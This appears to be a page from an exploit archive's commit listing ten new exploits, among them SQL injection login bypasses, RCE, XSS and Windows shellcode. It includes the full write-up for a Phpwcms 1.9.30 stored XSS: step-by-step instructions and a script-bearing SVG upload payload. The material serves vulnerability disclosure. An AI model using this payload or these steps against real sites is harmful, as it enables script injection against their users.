
10 changes to exploits/shellcodes

Exam Form Submission System 1.0 - SQL Injection Authentication Bypass
Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping
Blood Bank System 1.0 - SQL Injection / Authentication Bypass
Phpwcms 1.9.30 - File Upload to XSS
Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)
CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)
Directory Management System 1.0 - SQL Injection Authentication Bypass
Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
35 lines
No EOL
1 KiB
Text
# Exploit Title: Phpwcms 1.9.30 - File Upload to XSS
# Date: 30/9/2021
# Exploit Author: Okan Kurtulus | okankurtulus.com.tr
# Software Link: http://www.phpwcms.org/
# Version: 1.9.30
# Tested on: Ubuntu 16.04

Steps:

1-) You need to log in to the system.
http://target.com/phpwcms/login.php

2-) Create a payload with the SVG extension: payload.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS!");
</script>
</svg>


3-) Go to the following link and upload the payload:
http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8

From the menu:

file -> multiple file upload -> Select files or drop here

4-) After uploading the payload, call it from the link below.

http://192.168.1.112/phpwcms/upload/